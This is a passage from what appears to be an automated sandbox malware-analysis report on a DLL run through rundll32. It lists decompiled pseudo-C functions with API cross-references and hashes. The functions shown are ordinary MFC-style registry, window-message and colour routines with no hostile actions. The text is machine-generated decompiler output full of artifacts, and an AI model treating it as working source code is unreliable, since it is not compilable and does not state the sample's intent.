				_t44 = E1000BB54(__ecx, __edx);
				_v28 = _t44;
				if(_t44 != 0) {
					do {
						__eax =  &_v28;
						_push(__eax);
						__ecx = __esi;
						E1000BB65();
						__eflags = __eax - __edi;
						if(__eax != __edi) {
							__edx =  *__eax;
							__ecx = __eax;
							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
						}
						__eflags = _v28 - __edi;
					} while (_v28 != __edi);
				}
				__eflags =  *(_t100 + 0x54);
				if( *(_t100 + 0x54) == 0) {
					L15:
					 *[fs:0x0] = _v12;
					_pop(_t98);
					_pop(_t101);
					_pop(_t80);
					_t47 = E100167D5(1, _t80, _a264 ^ _t104, _t95, _t98, _t101);
					__eflags =  &_a268;
					return _t47;
				} else {
					__eflags =  *(_t100 + 0x68);
					__eflags = 0 |  *(_t100 + 0x68) != 0x00000000;
					if(__eflags != 0) {
						_push("Software\\");
						E10009FA3(_t79,  &_v16, 0, _t100, __eflags);
						_v4 = 0;
						E10009F7E(_t79,  &_v16,  *(_t100 + 0x54));
						_push(0x1002a248);
						_push( &_v16);
						_push( &_v36);
						_t54 = E1000BC25(_t79, 0, _t100, __eflags);
						_push( *(_t100 + 0x68));
						_v4 = 1;
						_push(_t54);
						_push( &_v24);
						E1000BC25(_t79, 0, _t100, __eflags);
						_v4 = 3;
						E10009CB7(_v36 + 0xfffffff0, _t95);
						_push( &_v24);
						_push(0x80000001);
						E1000BC89(_t79, 0, 0x80000001, __eflags);
						_t61 = RegOpenKeyA(0x80000001, _v16,  &_v20);
						__eflags = _t61;
						if(_t61 == 0) {
							__eflags = RegEnumKeyA(_v20, 0, _t104, 0x104) - 0x103;
							if(__eflags == 0) {
								_push( &_v16);
								_push(0x80000001);
								E1000BC89(_t79, 0, 0x80000001, __eflags);
							}
							RegCloseKey(_v20);
						}
						RegQueryValueA(0x80000001, _v24, _t104,  &_v32);
						E10009CB7( &(_v24[0xfffffffffffffff0]), _t95);
						__eflags =  &(_v16[0xfffffffffffffff0]);
						E10009CB7( &(_v16[0xfffffffffffffff0]), _t95);
						goto L15;
					} else {
						_push(_t104);
						_push(_t81);
						_v280 = 0x10057298;
						E10017C83( &_v280, 0x1002e2fc);
						asm("int3");
						_push(4);
						E10017BC1(E10027DEC, _t79, 0, _t100);
						_t94 = E10013965(0x104);
						_v292 = _t94;
						_t77 = 0;
						_v280 = 0;
						if(_t94 != 0) {
							_t77 = E1000CF71(_t94);
						}
						return E10017C60(_t77);
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 1000BDB7
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 1000BE73
RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 1000BE8A
RegCloseKey.ADVAPI32(?,?,?,?,?,Software\,00000018), ref: 1000BEA4
RegQueryValueA.ADVAPI32(80000001,?,?,?), ref: 1000BEB6

Strings

Software\, xrefs: 1000BE0C

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CloseEnumH_prolog3OpenQueryValue
String ID: Software\
API String ID: 3878845136-964853688
Opcode ID: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
Instruction ID: bb9b01b2753fba5bda47465ad6778d866e06322e4a0b808ca87f46191af68194
Opcode Fuzzy Hash: 7ebb37ec80ad41570234b5e56baee62c3bc695e135d0d4cdd5ea00e84b8678cd
Instruction Fuzzy Hash: 6241AC31900559AFEB11DFA4CC81EFEB7B9EF48390F20052AF552E2294DB74AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 1000F6F2, Relevance: 10.6, APIs: 7, Instructions: 115
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E1000F6F2(intOrPtr* __ecx, signed int _a4) {
				struct HWND__* _v4;
				struct tagMSG* _v8;
				int _v12;
				int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t42;
				struct tagMSG* _t43;
				signed int _t45;
				void* _t48;
				void* _t50;
				int _t53;
				long _t56;
				signed int _t62;
				intOrPtr* _t64;
				intOrPtr* _t67;
				void* _t68;

				_t63 = __ecx;
				_t62 = 1;
				_t67 = __ecx;
				_v12 = 1;
				_v16 = 0;
				if((_a4 & 0x00000004) == 0 || (E10012862(__ecx) & 0x10000000) != 0) {
					_t62 = 0;
				}
				_t42 = GetParent( *(_t67 + 0x20));
				 *(_t67 + 0x3c) =  *(_t67 + 0x3c) | 0x00000018;
				_v4 = _t42;
				_t43 = E1000B519(0);
				_t68 = UpdateWindow;
				_v8 = _t43;
				while(1) {
					L14:
					_t73 = _v12;
					if(_v12 == 0) {
						goto L15;
					}
					__eflags = PeekMessageA(_v8, 0, 0, 0, 0);
					if(__eflags != 0) {
						while(1) {
							L15:
							_t45 = E1000B911(_t63, 0, _t67, _t73);
							if(_t45 == 0) {
								break;
							}
							if(_t62 != 0) {
								_t53 = _v8->message;
								if(_t53 == 0x118 || _t53 == 0x104) {
									E100128D7(_t67, 1);
									UpdateWindow( *(_t67 + 0x20));
									_t62 = 0;
								}
							}
							_t64 = _t67;
							_t48 =  *((intOrPtr*)( *_t67 + 0x80))();
							_t79 = _t48;
							if(_t48 == 0) {
								_t39 = _t67 + 0x3c;
								 *_t39 =  *(_t67 + 0x3c) & 0xffffffe7;
								__eflags =  *_t39;
								return  *((intOrPtr*)(_t67 + 0x44));
							} else {
								_t50 = E1000B82B(_t62, _t64, 0, _t67, _t68, _t79, _v8);
								_pop(_t63);
								if(_t50 != 0) {
									_v12 = 1;
									_v16 = 0;
								}
								if(PeekMessageA(_v8, 0, 0, 0, 0) != 0) {
									continue;
								} else {
									goto L14;
								}
							}
						}
						_push(0);
						E1000A5E4();
						return _t45 | 0xffffffff;
					}
					__eflags = _t62;
					if(_t62 != 0) {
						_t63 = _t67;
						E100128D7(_t67, 1);
						UpdateWindow( *(_t67 + 0x20));
						_t62 = 0;
						__eflags = 0;
					}
					__eflags = _a4 & 0x00000001;
					if((_a4 & 0x00000001) == 0) {
						__eflags = _v4;
						if(_v4 != 0) {
							__eflags = _v16;
							if(_v16 == 0) {
								SendMessageA(_v4, 0x121, 0,  *(_t67 + 0x20));
							}
						}
					}
					__eflags = _a4 & 0x00000002;
					if(__eflags != 0) {
						L13:
						_v12 = 0;
						continue;
					} else {
						_t56 = SendMessageA( *(_t67 + 0x20), 0x36a, 0, _v16);
						_v16 = _v16 + 1;
						__eflags = _t56;
						if(__eflags != 0) {
							continue;
						}
						goto L13;
					}
				}
				goto L15;
			}

APIs

GetParent.USER32(?), ref: 1000F720
PeekMessageA.USER32 ref: 1000F747
UpdateWindow.USER32(?), ref: 1000F761
SendMessageA.USER32(?,00000121,00000000,?), ref: 1000F785
SendMessageA.USER32(?,0000036A,00000000,00000004), ref: 1000F79F
UpdateWindow.USER32(?), ref: 1000F7E5
PeekMessageA.USER32 ref: 1000F819

Part of subcall function 10012862: GetWindowLongA.USER32 ref: 1001286D

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
Instruction ID: ecef1c15dac149fec5e590ec2565d957468d58fa3f8c06f10f68a2e84cd0c50c
Opcode Fuzzy Hash: 1a7b99641fbd6274f08d233d62057ee23ad71d0a046cd1d00a2b03b8b2250d72
Instruction Fuzzy Hash: 3041C1312087429BE711CF258C88A2BBAF4FFC5BD4F10092DF589928A4DB71D946EB53

Uniqueness

Uniqueness Score: -1.00%

Function 1000AE8A, Relevance: 10.6, APIs: 7, Instructions: 111
windowCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E1000AE8A(int __ebx, long __ecx, struct HWND__* __edi) {
				long _v4;
				char _v28;
				intOrPtr _v40;
				void* __esi;
				void* __ebp;
				long _t20;
				long _t21;
				struct HWND__* _t22;
				long _t23;
				struct HWND__* _t24;
				long _t25;
				struct HWND__* _t26;
				void* _t33;
				void* _t35;
				long _t39;
				long _t41;
				intOrPtr _t43;
				struct HWND__* _t47;
				struct HWND__* _t49;
				long _t51;
				long _t53;

				_t46 = __edi;
				_t39 = __ecx;
				_t37 = __ebx;
				if( *((intOrPtr*)(__ecx + 0x78)) == 0) {
					_t51 = E1000A7CE();
					__eflags = _t51;
					if(_t51 != 0) {
						_t20 =  *((intOrPtr*)( *_t51 + 0x120))();
						__eflags = _t20;
						_t41 = _t51;
						_pop(_t52);
						if(_t20 != 0) {
							_t53 = _t41;
							_t21 =  *(_t53 + 0x64);
							__eflags = _t21;
							if(_t21 == 0) {
								_pop(_t52);
								goto L12;
							} else {
								__eflags = _t21 - 0x3f107;
								if(__eflags != 0) {
									_t35 = E1000D5EC(__ebx, __edi, _t53, __eflags);
									_t21 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t35 + 4)))) + 0xac))( *(_t53 + 0x64), 1);
								}
								return _t21;
							}
						} else {
							L12:
							_push(_t41);
							_push(_t37);
							_push(0);
							_push(_t52);
							_push(_t46);
							_v4 = _t41;
							_t22 = GetCapture();
							_t51 = SendMessageA;
							_t37 = 0x365;
							while(1) {
								_t47 = _t22;
								__eflags = _t47;
								if(_t47 == 0) {
									break;
								}
								_t23 = SendMessageA(_t47, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									L27:
									return _t23;
								} else {
									_t22 = E10010DA7(_t41, _t47, __eflags, _t47);
									continue;
								}
								goto L33;
							}
							_t24 = GetFocus();
							while(1) {
								_t46 = _t24;
								__eflags = _t46;
								if(_t46 == 0) {
									break;
								}
								_t23 = SendMessageA(_t46, _t37, 0, 0);
								__eflags = _t23;
								if(__eflags != 0) {
									goto L27;
								} else {
									_t24 = E10010DA7(_t41, _t46, __eflags, _t46);
									continue;
								}
								goto L33;
							}
							_t39 = _v4;
							_t25 = E10010DEC(_t37, _t39, _t46);
							__eflags = _t25;
							if(_t25 != 0) {
								_t26 = GetLastActivePopup( *(_t25 + 0x20));
								while(1) {
									_t49 = _t26;
									__eflags = _t49;
									_push(0);
									if(_t49 == 0) {
										break;
									}
									_t23 = SendMessageA(_t49, _t37, 0, ??);
									__eflags = _t23;
									if(__eflags == 0) {
										_t26 = E10010DA7(_t39, _t49, __eflags, _t49);
										continue;
									}
									goto L27;
								}
								_t23 = SendMessageA( *(_v4 + 0x20), 0x111, 0xe147, ??);
								goto L27;
							} else {
								goto L1;
							}
						}
					} else {
						L1:
						_push(0);
						_push(_t39);
						_v28 = 0x10057298;
						E10017C83( &_v28, 0x1002e2fc);
						asm("int3");
						_push(4);
						E10017BC1(E10027DEC, _t37, _t46, _t51);
						_t43 = E10013965(0x104);
						_v40 = _t43;
						_t33 = 0;
						_v28 = 0;
						if(_t43 != 0) {
							_t33 = E1000CF71(_t43);
						}
						return E10017C60(_t33);
					}
				} else {
					__eflags = __eax - 0x3f107;
					if(__eax != 0x3f107) {
						return  *((intOrPtr*)( *__ecx + 0xac))(__eax, 1);
					}
					return __eax;
				}
				L33:
			}

APIs

GetCapture.USER32 ref: 10014232
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 1001424B
GetFocus.USER32 ref: 1001425D
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 10014269
GetLastActivePopup.USER32(?), ref: 10014290
SendMessageA.USER32(00000000,00000365,00000000,00000000), ref: 1001429B
SendMessageA.USER32(?,00000111,0000E147,00000000), ref: 100142BF

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastPopup
String ID:
API String ID: 3219385341-0
Opcode ID: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
Instruction ID: 33038f709047c962cd6e8134d606cff9e197d9281aa775ba373aba56dbca1b45
Opcode Fuzzy Hash: ece27361fccefe4c1d9af4d39d412bb8da5438b11630c38f166ec2a3b357e9a2
Instruction Fuzzy Hash: D031E331300256EBE611EB24DC84E6E7AEDEF866D5B630629F841DF160CF71ECC19661

Uniqueness

Uniqueness Score: -1.00%

Function 1000FC8A, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000FC8A(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t43;
				struct HWND__* _t48;
				long _t61;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E1000B510();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E1000D61F(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E100174D0(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x28;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t61 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				E1000FAB8(_t61, _t72, GetWindowLongA, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t61) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf0))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E1000FBD6(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x114))();
			}

APIs

_memset.LIBCMT ref: 1000FD17
SendMessageA.USER32(00000000,00000405,00000000,?), ref: 1000FD40
GetWindowLongA.USER32 ref: 1000FD52
GetWindowLongA.USER32 ref: 1000FD63
SetWindowLongA.USER32(?,000000FC,?), ref: 1000FD7F

Strings

(, xrefs: 1000FD36

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: (
API String ID: 2997958587-3887548279
Opcode ID: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
Instruction ID: 83308454b4964f7b832e75e01b7e263ef3bf02c7b32fea1d5a5d450cbed2f8d3
Opcode Fuzzy Hash: 334c7e26ab9e293c68ecfd01600b3aa59bde0f1c2bd920c06c28c769ee1fcf56
Instruction Fuzzy Hash: 2E31B0756006159FEB14EF68C985A6EB7F9FF082D0F15052EE9469BA95EB30F800CB90

Uniqueness

Uniqueness Score: -1.00%

Function 10013E40, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013E40(intOrPtr __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				int _v20;
				intOrPtr _v24;
				intOrPtr _t32;

				_t32 = __ecx;
				_v24 = __ecx;
				_v16 = 0;
				_v8 = 0;
				_v12 = 0;
				if(RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8) == 0 && RegCreateKeyExA(_v8,  *(_t32 + 0x54), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20) == 0) {
					RegCreateKeyExA(_v12,  *(_v24 + 0x68), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				if(_v12 != 0) {
					RegCloseKey(_v12);
				}
				return _v16;
			}

0x10013e5b
0x10013e62
0x10013e65
0x10013e68
0x10013e6b
0x10013e76
0x10013ead
0x10013ead
0x10013eb8
0x10013ebd
0x10013ebd
0x10013ec2
0x10013ec7
0x10013ec7
0x10013ed0

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 10013E6E
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013E91
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 10013EAD
RegCloseKey.ADVAPI32(?), ref: 10013EBD
RegCloseKey.ADVAPI32(?), ref: 10013EC7

Strings

software, xrefs: 10013E56

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
Instruction ID: 4673323d0336752e6ce9d3e664aa048b12ff1b48ba7cb76d312e9863fa3d259e
Opcode Fuzzy Hash: 274d387f2041077595a9ef0d73c23cf33c700d5c2420ca228f327ec70e6c6d43
Instruction Fuzzy Hash: 7711B676D00259BBDB11DB9ACD88DDFBFFCEF85740B1040AAA504A2121D2719A55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10013CEE, Relevance: 10.6, APIs: 7, Instructions: 51
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10013CEE(void* __ecx, long* __edi, void* __esi) {
				long _t22;
				void* _t23;
				void* _t28;
				void* _t31;
				void* _t33;
				signed int _t35;
				long* _t40;
				void* _t41;
				void* _t42;

				_t41 = __esi;
				_t40 = __edi;
				_t31 = __ecx;
				LeaveCriticalSection( *((intOrPtr*)(_t42 - 0x18)) + 0x1c);
				E10017C83(0, 0);
				_t22 = E100134F9(_t31, 0, __edi[3], 4);
				_t33 = 2;
				_t23 = LocalReAlloc( *(__esi + 0xc), _t22, ??);
				_t46 = _t23;
				if(_t23 == 0) {
					LeaveCriticalSection( *(_t42 - 0x14));
					_t23 = E1000A0A7(0, _t33, __edi, __esi, _t46);
				}
				 *(_t41 + 0xc) = _t23;
				E100174D0(_t40, _t23 +  *(_t41 + 8) * 4, 0, _t40[3] -  *(_t41 + 8) << 2);
				 *(_t41 + 8) = _t40[3];
				TlsSetValue( *_t40, _t41);
				_t35 =  *(_t42 + 8);
				_t28 =  *(_t41 + 0xc);
				if(_t28 != 0 && _t35 <  *(_t41 + 8)) {
					 *((intOrPtr*)(_t28 + _t35 * 4)) =  *((intOrPtr*)(_t42 + 0xc));
				}
				_push( *(_t42 - 0x14));
				LeaveCriticalSection();
				return E10017C60(_t28);
			}

APIs

LeaveCriticalSection.KERNEL32(?), ref: 10013CF5
__CxxThrowException@8.LIBCMT ref: 10013CFF

Part of subcall function 10017C83: RaiseException.KERNEL32(?,?,?,?), ref: 10017CC3

LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004), ref: 10013D16
LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D23

Part of subcall function 1000A0A7: __CxxThrowException@8.LIBCMT ref: 1000A0BB

_memset.LIBCMT ref: 10013D42
TlsSetValue.KERNEL32(?,00000000), ref: 10013D53
LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441,00000000), ref: 10013D74

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
String ID:
API String ID: 356813703-0
Opcode ID: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
Instruction ID: da2c65ce7076d342f4508b5b0ea9d94b5e5006c79099ef9a6e76071fa7915ca4
Opcode Fuzzy Hash: 7dcaef9dd6dc2c20a9afc37e1070812523d3c5c417591cb16522903d097c7fc3
Instruction Fuzzy Hash: BD118E7450060AAFE710EF65DC8AC1BBBB9FF04354720C128F4599A566CB30ECA0CB50

Uniqueness

Uniqueness Score: -1.00%

Function 10013810, Relevance: 10.5, APIs: 7, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013810(void* __ecx) {
				struct HBRUSH__* _t14;
				void* _t18;

				_t18 = __ecx;
				 *((intOrPtr*)(_t18 + 0x28)) = GetSysColor(0xf);
				 *((intOrPtr*)(_t18 + 0x2c)) = GetSysColor(0x10);
				 *((intOrPtr*)(_t18 + 0x30)) = GetSysColor(0x14);
				 *((intOrPtr*)(_t18 + 0x34)) = GetSysColor(0x12);
				 *((intOrPtr*)(_t18 + 0x38)) = GetSysColor(6);
				 *((intOrPtr*)(_t18 + 0x24)) = GetSysColorBrush(0xf);
				_t14 = GetSysColorBrush(6);
				 *(_t18 + 0x20) = _t14;
				return _t14;
			}

0x1001381a
0x10013820
0x10013827
0x1001382e
0x10013835
0x10013842
0x10013849
0x1001384c
0x1001384f
0x10013853

APIs

GetSysColor.USER32(0000000F), ref: 1001381C
GetSysColor.USER32(00000010), ref: 10013823
GetSysColor.USER32(00000014), ref: 1001382A
GetSysColor.USER32(00000012), ref: 10013831
GetSysColor.USER32(00000006), ref: 10013838
GetSysColorBrush.USER32(0000000F), ref: 10013845
GetSysColorBrush.USER32(00000006), ref: 1001384C

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
Instruction ID: 74b272bfbd302397870cb0a2abf86f81c97ca9371361d4e5ce15514e9afb48cd
Opcode Fuzzy Hash: ec9fc2993fab2a5d820fe3d8a281f31af429397108a6c3a84ca499368f54399a
Instruction Fuzzy Hash: E8F01C71940748ABE730BF728D49B47BAE5FFC4B10F12092ED2858BA90E6B6E041DF40

Uniqueness

Uniqueness Score: -1.00%

Function 10028DE5, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24
registrywindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10028DE5() {
				long _t5;
				int _t6;

				if((0x80000000 & GetVersion()) == 0 || GetVersion() != 4) {
					_t5 = GetVersion();
					if((0x80000000 & _t5) != 0) {
						L5:
						 *0x1005acc4 =  *0x1005acc4 & 0x00000000;
						return _t5;
					}
					_t5 = GetVersion();
					if(_t5 != 3) {
						goto L5;
					}
					goto L4;
				} else {
					L4:
					_t6 = RegisterWindowMessageA("MSWHEEL_ROLLMSG");
					 *0x1005acc4 = _t6;
					return _t6;
				}
			}

0x10028df6
0x10028e00
0x10028e04
0x10028e20
0x10028e20
0x00000000
0x10028e20
0x10028e06
0x10028e0c
0x00000000
0x00000000
0x00000000
0x10028e0e
0x10028e0e
0x10028e13
0x10028e19
0x00000000
0x10028e19

APIs

GetVersion.KERNEL32 ref: 10028DED
GetVersion.KERNEL32 ref: 10028DF8
GetVersion.KERNEL32 ref: 10028E00
GetVersion.KERNEL32 ref: 10028E06
RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 10028E13

Strings

MSWHEEL_ROLLMSG, xrefs: 10028E0E

Memory Dump Source

Source File: 00000003.00000002.351306324.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.351299572.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351419262.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.351434421.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.351489328.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351499406.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.351511171.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Version$MessageRegisterWindow
String ID: MSWHEEL_ROLLMSG
API String ID: 303823969-2485103130
Opcode ID: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
Instruction ID: a1cfe5ae80d7d924f96357e0403be069d270e7200ca7c890729efff85db7b39d
Opcode Fuzzy Hash: 85f3e66c9038b440300e9b11d08aab107bdf81c33b47830274e071894da04cd4
Instruction Fuzzy Hash: 34E0D83E80213792F700A374AD0034939D5DB442E0F930066ED0042258CB24098747A5

Uniqueness

Uniqueness Score: -1.00%

Function 1000C209, Relevance: 9.1, APIs: 6, Instructions: 115
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E1000C209(void* __ecx, void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t37;
				signed int _t54;
				intOrPtr _t57;
				long _t60;
				struct HWND__* _t63;
